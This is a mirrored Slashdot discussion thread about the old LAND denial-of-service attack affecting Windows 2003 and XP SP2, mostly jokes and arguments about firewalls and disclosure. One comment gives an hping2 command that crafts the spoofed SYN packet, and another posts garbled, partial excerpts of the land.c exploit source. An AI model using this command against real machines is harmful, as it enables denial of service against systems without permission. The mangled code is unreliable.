Slashdot Mirror
Windows 2003 and XP SP2 Vulnerable To LAND Attack
An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, WIndows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
Are only Windows platform vulnerable or will these attacks be successful on other non-ms platforms ?
Trolling using another account since 2005.
It is also subject to sea and air attacks.
In other news, my computer is also prone to failing if I microwave it... hit it with a hammer, or attempt to install water cooling while I'm drunk...
---
Programming is like sex... Make one mistake and support it the rest of your life.
"Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on."
Machines that are not protected are vulnerable. Well, that isn't really news is it? Sounds pretty silly to me.
Only one remote hole in the kernel FOR eight years!
You mean to tell me that XP and 2k3 contain buggy legacy code? that IS news!
Isn't this EXACTLY what regression tests were designed for?
Amazing, if I don't use I firewall, I'm vulnerable. Who would have thought?
E = m c^3 Don't drink and derive E = m c^3
Anyway, given all the warnings about Internet security in the last five years, the majority of users will already have downloaded and installed firewall programs such as ZoneAlarm.
It may be a little thing called a firewall. A firewall is a spyware-like little piece of software that constantly pings a special server called a firedoor so that spammers hackers, and their ilk know when your computer is available on the internet. Unfortuntely Microsoft refuses to release a patch for this thing but a piece of software called a backdoor can be used to prevent the firewall from doing its dirty work. Download one today!
01 if by LAND, 10 if by SEA
At least with SP2 there is some basic security in terms of the firewall being on by default.
Still, never thought I'd see a slashdot article linking to a page about Trumpet Winsock in 2005!
Get a free iPod Nano 4GB!
Windows is one of the safest OS around (and to keep it that way it is advised that the computer should not be connected to internet or any other network for that matter)
fuvoo: watch something
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community.
Of course they didn't reply. They're under LAND attack, and your message is caught in the server. You must have sent them a proof-of-concept, so what did you expect?
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most windows-based webservers.
Tm
Support TBI Research: http://www.raisinhope.org
Of course, some windows machines need to have open ports, like, say, if they're offering *services*. So really, your mundane desktop need not be affected. It's the production server you should be quite terrified about.
WARNING: there is a trojan on your
A friend showed this to me a few days ago and I was unable to reproduce the attack over the LAN, both with my own code and some code of the original LAND found with google. Both were run from linux by opening a raw socket, filling in ip and tcp headers including checksums using the structs in ip.h and tcp.h, and sending with sendto(). In both cases ethereal would show the packet as recieved but the machine would operate normally.
8 years is hardly enough to figure out how to patch windows.
Besides, like all everyone here says, it is the users own fault for not using a firewall. Having an expectation that 8 yr old attacks should be fixed is just unreasonable.
WTF, are you all on crack?
I remember the days of Ping of Death, Land, Teardrop, New Tear, Bork, etc.
Now that my WinXP SP2 system is susceptible to land again, it's getting me into a nostalgic mood. I think I'll go play Ms PacMan on my MAME cabinet now.
I'm a big tall mofo.
Just remember that these people running 2003/XP without a firewall would also be running *NIX with a root password of "password". Mine is 12345
I have yet to install SP2 because I heard it hurts performance of some computer games, which is mainly what I use my windows PC for.
I am otherwise up-to-date with windows updates. I have a linksys router for my internet connection, but no software firewall.
Am I vulnerable to this and other issues? Should I update to SP2 already (the first time I tried it crashed while installing, didn't even work, but I could prob. get it to work next time). Or should I stay with SP1 for games?
Thank you.
WTF is a LAND attack? From the source:
"LAND attack:
Sending TCP packet with SYN flag set, source and destination IP address and source and destination port as of destination machine, results in 15-30 seconds DoS condition."
If I understand correctly, this means the vulnerable machine will attempt to synchronise a connection with itself?
I find this quote enlightening:
"Ethic:
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community. "
So the vulnerability was made public. So exploits are going to be made. However, if Microsoft, who claim to have shifted more focus to security issues, had even acknowledged this report, the vulnerability wouldn't have become public so soon without a patch.
Kinda worries you about the way computer security is handled, doesn't it?
Misleading titles? Inflammatory blurbs? Keep in mind that Slashdot is a tabloid.
Nobody deserves to get their Boxen hacked, even if they don't always use the best available defenses.
That is like saying the rape victim is at fault "'cause she looked so sexy"
We've moved on to more productive uses of vulnerable machines (e.g. spam zombies). Who wants to do a DOS attack on a machine without a firewall anyway? What's the point?
Have you read my blog lately?
I work in a university. Policy is not to have the Windows firewall turned on because it supposedly conflicts with a few needed applications. There is no hardware firewall whatsoever between the internal network and the outside world.
Oh, and standard policy is to have user accounts set up as Administrator at all times.
Cleaning up infected machines is a never-ending endeavour. Oddly, the few departments run by competent admins (as in, not the university's IT department) where user accounts are set up only as Users (among other things) don't have any security problems at all. I wonder why..
Oh, and before anyone blames me: I'm a grunt with no authority whatsoever. I've voiced my objections to the way things are run, but I can do little more than that.
STOP MISUSING APOSTROPHES, YOU MORONS!!!
I would think that there would still be a lot of people (home users) who are running Windows 95, 98, 2000 or XP unpatched. Not everybody can afford to buy new systems every couple of years, and not everybody would even think of upgrading their operating system, let alone patching it or activating a firewall.
Anakin Simpson: If you're not with me, then you're my enemy--ooh, donuts!
Experts say servers are vulnerable to the infamous CAFE attack. One drop can take down an entire network!
Granted you have to have a computer next to a cup of coffee for this to work, but MANY PEOPLE DO!!!!!!!!!!
If Nalgene water bottles are outlawed, only outlaws will have Nalgene water bottles.
Grab a copy of hping2 and try:
hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd
Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test
Yep, I never spell check.
More incorrect spellings can be found he
BSDI 2.1 (vanilla) IS vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
BSDI 3.0 NOT vulnerable
Digital UNIX 4.0 NOT vulnerable
FreeBSD 2.2.2-RELEASE IS vulnerable
FreeBSD 2.2.5-RELEASE IS vulnerable
FreeBSD 2.2.5-STABLE IS vulnerable
FreeBSD 3.0-CURRENT IS vulnerable
HP-UX 10.20 IS vulnerable
IRIX 6.2 NOT vulnerable
Linux 2.0.30 NOT vulnerable
Linux 2.0.32 NOT vulnerable
MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
NetBSD 1.2 IS vulnerable
NeXTSTEP 3.0 IS vulnerable
NeXTSTEp 3.1 IS vulnerable
Novell 4.11 NOT vulnerable
OpenBSD 2.1 IS vulnerable
OpenBSD 2.2 (Oct31) NOT vulnerable
SCO OpenServer 5.0.4 NOT vulnerable
Solaris 2.5.1 IS vulnerable (conflicting reports)
SunOS 4.1.4 IS vulnerable
Windows 95 (vanilla) IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
Trolling using another account since 2005.
Comment removed based on user account deletion
I know the land attack is old, but still, linking to a .c ? Why not link to the description of the attack and let that be enough. I was not aware /. was a scriptkiddie toolz warehouse. As stated by the article, there are still probably a bunch of machines this will affect, and putting a link directly to LAND.c on the main page probably isnt such a good idea. Whats next, root kits?
/. don't know how to use a search engine?
Honestly. Why don't you just stick your head in the ground every time there's a problem. If you don't see it, it can't be real.
C'mon. How much more difficult is it to go to google, type in "land.c" and get the source yourself?
Do you honestly think people visiting
Besides, any good system administrator has to assume that every user out there has access to the latest, greatest, and most sophisticated tools to get into their systems.
And this is an 8 year-old exploit to boot.
OH NOES! He linked to the h4x0r f13lz! Whut k4nz W3 DOOZ?! C4llz 0wtz t3h wh4mbul4nc3!!!11!!
It shouldn't matter a single bit what gets linked to. The information is out there, anyone who wants to find it will. You can't try and suppress it. And to say that linking to it makes it easier... what did I just say about search engines? Oh gee, I've been saved a whole 5 seconds from going to google and finding it myself. Maybe all windows machiens will be patched within that time?
Vizzini: You only think I guessed wrong - that's what's so funny. I switched glasses when your back was turned. Ha-ha, you fool. You fell victim to one of the classic blunders, the most famous of which is "Never get involved in a land war in Asia", but only slightly less well known is this: "Never go in against a Sicilian, when *death* is on the line.". Hahahahahah. [Vizzini falls over dead]
(Yeah, off topic, I don't care.)
I'm not a programmer, so looking through a C file isn't likely to give me any useful information, unless it's in comments at the beginning of the code. What's more, I imagine even programmers would rather just hear a summary than have to sit there and look through a bunch of code to figure out what it does.
/. stories, link to relivant and if possible, concise descriptions of terms that people are likely to be unfarmilar with. If you want to provide a link to source, do it seperatly and note it as such.
I mean ethical issues aside, it's just not that helpful to most people. I'm sure most people though "WTF is a LAND attack?" and cliked on the link to see. Getting a C file, is probably not the answer they wanted, espically given that it doesn't seem to be transfering, so I can't even see if it has useful comments or not.
When doing
I know the land attack is old, but still, linking to a .c ? I was not aware /. was a scriptkiddie toolz warehouse.
Not only that, it was unlabeled. That means anybody who follwed the link now has a copy of the malware in their machine's webcache, minimum. And if they saved it (to keep the list of vulnerable configurations, for example) they have the malware itself.
This simultaneously puts a bunch of slashdot readers at legal risk (from false prosecution and/or in-court character assasination, based on evidence from a siezed computer) and gives real baddies plausible deniability.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Security through obsecurity doesn't work. Here's the important part of the source :) Basically it just sends a SYN packet which has the target's address as the source and the destination (same port as well).
z eof(struct iphdr)/4;t tl=255;d dr=sin.sin_addr.s_addr;a ddr.s_addr;
h _dport=sin.sin_port;1 C);f f=sizeof(struct tcphdr)/4;
. s_addr;_ addr;g th=htons(sizeof(struct tcphdr));
---snip---
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=si
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->
ipheader->protocol=IP_TCP;
ipheader->sa
ipheader->daddr=sin.sin_
tcpheader->th_sport=sin.sin_port;
tcpheader->t
tcpheader->th_seq=htonl(0xF
tcpheader->th_flags=TH_SYN;
tcpheader->th_o
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr
pseudoheader.daddr.s_addr=sin.sin_addr.s
pseudoheader.protocol=6;
pseudoheader.len
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
---snip---
http://support.microsoft.com/default.aspx?scid=kb; en-us;165005
In Soviet Russia, Trojan exploits YOU!
StrayByte.Net
Just 5 minutes before I read this post, I turned firewall on my WinXP SP2 machine off, testing someting on our LAN.
Can you imagine what amount of fear I felt when I realized that this guy lived only 2 miles from my office...
No sig today.
I pointed this out YEARS ago. I just don't understand why the updated winsock didn't get used in 2k when they overhauled the tcp stack. (and wow is that an old email addy. heh)
Gonzo Granzeau
"Nothing the god of biomechanics wouldn't let you into heaven for.." -Roy Batty
That's a list of operating systems from 1997, taken out of an exploit from 1997. Linux 2.0.30? Novell 4.11? Solaris 2.5.1?
Would all you morons shouting about firewalls shut up for thirty seconds and consider the following scenario:
User is in big corp behind firewall.
User receives email claiming to be something or other.
User runs attachment.
All 'doze boxes in big corp stop working.
Firewalls are (a) not the answer to all crap coding and (b) not perfect solutions even so.
Justin.
You're only jealous cos the little penguins are talking to me.
Everytime MS has a security bug that causes millions in damage, MS gets a little bit more egg on their face.
So now we have Bill Gates and co. coming out and saying, "Windows is our #1 priority." Everyone feels better, because hey... Bill's on the case right?
Then, out of left-field, it turns out that Windows is vulnerable to an exploit that's practically ancient in the biz. And what if you can get through the firewall somehow? Or what if you're cruising around wireless networks on a laptop?
This kind of one-shot lockup is something from the dark ages of computing. Everyone's confidence in MSshould be lowered even further.
Slashdot. It's Not For Common Sense
Using OpenBSD pf(4):
An IIS server behind this isn't seeing those packets.
Unfortuntately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?
Since this attack sends a packet with a source address of the target host rather than the attacker, won't this attack fail in a vast majority of remote situations (i.e. via Internet or not on the same LAN as the target)?? Doesn't almost every ISP filter outgoing packets for a bit of sanity, especially valid (or reasonable) source addresses? I know my ISPs at home (Adelphia cable) and work (AT&T data) do.
-Lod
The idea behind a server (such as the affected W2K3 server) being connected to a network is to provide a service to the clients. If the machine is not fit to provide services to the network, might as well go back to the store and ask for a reimbursment and exchange to XP workstation.
The only safe way to safely run this server is to place it behind a SPI firewall. Packet filters will have a hard time detecting and blocking this kind of attack, you will need a full blown SPI to defend and block against these attacks.
SMCs, Linksys and other consumer level firewall seem to be vulnerable to this thing, the only thing that might save your server is the NAT they might provide. Of course if you are running your server on a public routable IP, then you better start thinking of running a serious setup there.
My other OS is the MCP!
Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
OK, so what you're saying is that in order for XP to be vulnerable, it must be directly connected to the Internet, the user must specifically have disabled the firewall, and no intermediate firewall must be present.
At what point do we cease blaming Microsoft for stupid user tricks? I mean, Microsoft has freely given SP2 to anyone who wants it. Pretty soon it will be a mandatory download from WindowsUpdate. People bitched and moaned for years that Microsoft didn't do enough for security and didn't default to having updates apply automatically. But when Microsoft finally does improve security (with a better firewall) and tries to turn it all on by default, everyone griped. Damned if you do...
Look, if a Windows zealot took something like Fedora, turned on a bunch of services, turned off the firewall, and then griped because his box got hacked, Slashdotters everywhere would be screaming that this guy was a fool, that Linux security is great when it's not sabotaged by an idiot at the keyboard. And they'd be right. But when an attack requires that a Windows user actively subvert the very security measures Microsoft's put in place to protect him, everybody blames Microsoft. Nope, no bias to see here, citizens, please move along.
In the end they will lay their freedom at our feet and say to us, Make us your slaves, but feed us. - Fyodor Dostoyevsky
I hit a Windows XP SP1 box with this to no effect. I had to make some changes to even compile it (http://mixter.void.ru/glibc.txt). But the test box didn't blink.
perl -e 'foreach(values %SIG){$_="IGNORE";}while(){}'
Many corporate networks only protect the connection between the Internet and the LAN, and it only takes one sales guy to bring in a breached laptop to topple this type of security. I've seen this happen quite often.
-- I bought this SIG on ebay.
Believe it or not, some folks still use Solaris 2.5 and 2.6 versions. I used to work at a university whose physics department was fortunate enough to have two electron scanning microscopes, one old and huge and one new, smaller one. The old one had controlling software that was custom, to say the least, and written by a German firm that's been out of business for a few years now.
... unbelievable really), moving *away* from Sendmail, installing Solaris machines with everything locked down, etc, etc). Drove me fucking mad.
Guess what OS the software ran on? And what hardware connections were custom to the old Sparc-based controller the ran the thing? Wohoo! Old Solaris was the only way it'd still 'go'.
Well, sneaker-net wasn't going to work for the grads that were abroad and well, the profs wanted network access, so they were going to get it. Short of the long, we had to build, tweak and mess with all kinds of junk (tcpwrappers, ssh, ssl) before it went back on the network (yes, that donkey had been hacked before). So yes, there's lots of old Solaris still out there.
And before anyone asks, yes I finally quit that job due to *not* being able to secure things like this. Authenticating gateways, openvpn, pf on Solaris (boss would *never* let me put that on all the machines we cared for
It doesn't need the firewall to be disabled. It just needs an open port. Many machines have some ports open for things like p2p. The summary should either not mention this at all or mention this in its entirity. Just saying that the firewall needs to be disabled is misleading (at least for some/most people).
Yes, it actually works on SP2. Fire up Task Manager and watch CPU load reach 100% for ~10 seconds for a single packet.
Here's the code that should compile on Linux.
Windows users are vulnerable to Land Sharks.
Knock knock.
Who's there?
Pizza man.
I didn't order a pizza.
(pause)
Mailman.
Today is Sunday, there is no mail.
(pause)
Doorman.
Our building has no doorman.
(pause)
Travelling salesman.
I don't want anything.
(pause)
Gumby.
Oh, it's Gumby!
(opens door)
RARRRRRRR!!!!!
... backwards-compatibility.
Let's see OSS match this! A bug, almost a decade old, STILL SUPPORTED!